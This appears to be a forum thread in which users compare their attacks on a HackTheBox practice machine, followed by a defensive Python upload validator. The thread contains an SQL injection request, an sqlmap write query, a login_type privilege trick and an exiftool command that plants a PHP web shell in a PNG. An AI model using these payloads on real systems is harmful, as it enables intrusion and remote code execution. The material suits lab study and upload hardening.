(June 25, 2022, 08:06 PM) langetmama11 Wrote:
SQLi found in id parameter.
Here's the request:

    GET /?p=view_bike&id=c4ca4238a0b923820dcc509a6f75849b HTTP/1.1
    Host: portal.carpediem.htb
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: PHPSESSID=f6204505d2b42d3bbf2851c7c848a294
    Upgrade-Insecure-Requests: 1

Was able to dump the whole db, which includes the admin password in md5, but was unable to decrypt it.
Also found something interesting in the DB stating a file named 'Sales_Report.xlsx'. Currently fuzzing to find this file.
Note: Seems like the admin has uploaded an avatar. We need to get admin to upload shell I suppose.

(June 25, 2022, 08:10 PM) hacker1111 Wrote:
There's a login_type parameter; change it to 1 and you can access /admin after that.

(June 25, 2022, 08:27 PM) Toto Wrote:
Where did you find this parameter?

(June 25, 2022, 08:31 PM) hacker1111 Wrote:
Update your profile and intercept the req. in Burp.

(June 25, 2022, 08:36 PM) Toto Wrote:
Okay thanks, missed it for some reason. Anyone got any success with uploading images?
https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html

(June 25, 2022, 08:40 PM) hacker1111 Wrote:
Change .jpg/.png to .php in Burp and right click on the broken image for the full path.

(June 25, 2022, 08:50 PM) Toto Wrote:
Doesn't seem to work, tried uploading .php.jpg and .php but can't seem to reach the file afterwards.

Another user Wrote:
http://portal.carpediem.htb/admin/report/ is accessible. Couldn't get anything from it though.

(June 25, 2022, 08:53 PM) netrise Wrote:
Hello, I can't update my profile using sqlmap:

    sqlmap -r req --sql-query="UPDATE portal.users SET login_type = 1 WHERE id=2;"

Another user Wrote:
On the quarterly sales report it seems like we can add files.
By intercepting the request in Burp it says: {"error":"multipart\/form-data missing"}
We can play with that and see if we can upload a shell.

Another user Wrote (replying to netrise, 08:53 PM):
Then can u change the admin's password? Tell me if it worked.

(June 25, 2022, 08:56 PM) Exa Wrote (replying to netrise, 08:53 PM):
During registration, add login_type=1 with Burp.
I tried SQL queries too, but that didn't work.

(June 25, 2022, 08:57 PM) hacker1111 Wrote (replying to Toto, 08:50 PM):
Use a .png file:

    exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' random.png

and in Burp just change the ext. .png to .php and send. Refresh the /admin user profile page and right click on the broken image for the full path.

netrise Wrote (replying to Exa, 08:56 PM):
GOOD JOB, it worked.

(June 25, 2022, 09:04 PM) Toto Wrote (replying to hacker1111, 08:57 PM):
Can't seem to execute anything, did you succeed in getting anything?

Another user Wrote (replying to Toto, 09:04 PM):
I can't intercept the request for uploading the image in Burp.
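The upload weakness the thread circles around is an avatar handler that trusts the client-supplied filename and never inspects the bytes, so a PNG carrying a PHP tag in its Comment chunk can be stored as `.php`. The following server-side validator is an added example (not code from the thread or from the box); it assumes an extension allowlist, a PNG chunk walk to locate the text chunks exiftool writes to, and a constructed 1x1 PNG as sample input.

```python
import struct
import zlib

ALLOWED_EXT = {"png", "jpg", "jpeg"}          # assumed policy: images only, decided server-side
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PHP_MARKERS = (b"<?php", b"<?=")
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}     # where exiftool -Comment lands in a PNG

def build_png(comment: bytes) -> bytes:
    """Constructed sample: minimal 1x1 grayscale PNG with a tEXt 'Comment' chunk."""
    def chunk(ctype, data):
        crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
        return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit, color type 0
    idat = zlib.compress(b"\x00\x00")                    # filter byte + one pixel
    return (PNG_MAGIC + chunk(b"IHDR", ihdr)
            + chunk(b"tEXt", b"Comment\x00" + comment)
            + chunk(b"IDAT", idat) + chunk(b"IEND", b""))

def png_text_chunks(data: bytes):
    """Walk the chunk list; return payloads of textual chunks, or None if not a PNG."""
    if not data.startswith(PNG_MAGIC):
        return None
    out, pos = [], len(PNG_MAGIC)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if ctype in TEXT_CHUNKS:
            out.append(data[pos + 8:pos + 8 + length])
        pos += 12 + length                                # length + type + data + crc
    return out

def validate_upload(filename: str, data: bytes):
    """Return (accepted, reason). Extension comes from the name the server will store."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return False, f"extension '{ext}' not allowed"
    if ext == "png":
        chunks = png_text_chunks(data)
        if chunks is None:
            return False, "content is not a PNG"
        if any(m in body for body in chunks for m in PHP_MARKERS):
            return False, "PHP tag found in PNG text chunk"
    elif not data.startswith(b"\xff\xd8\xff"):
        return False, "content is not a JPEG"
    return True, "ok"
```

Storing uploads outside the web root, or with PHP execution disabled for that directory, is what makes the "full path from the broken image" step harmless even when a check like this is bypassed.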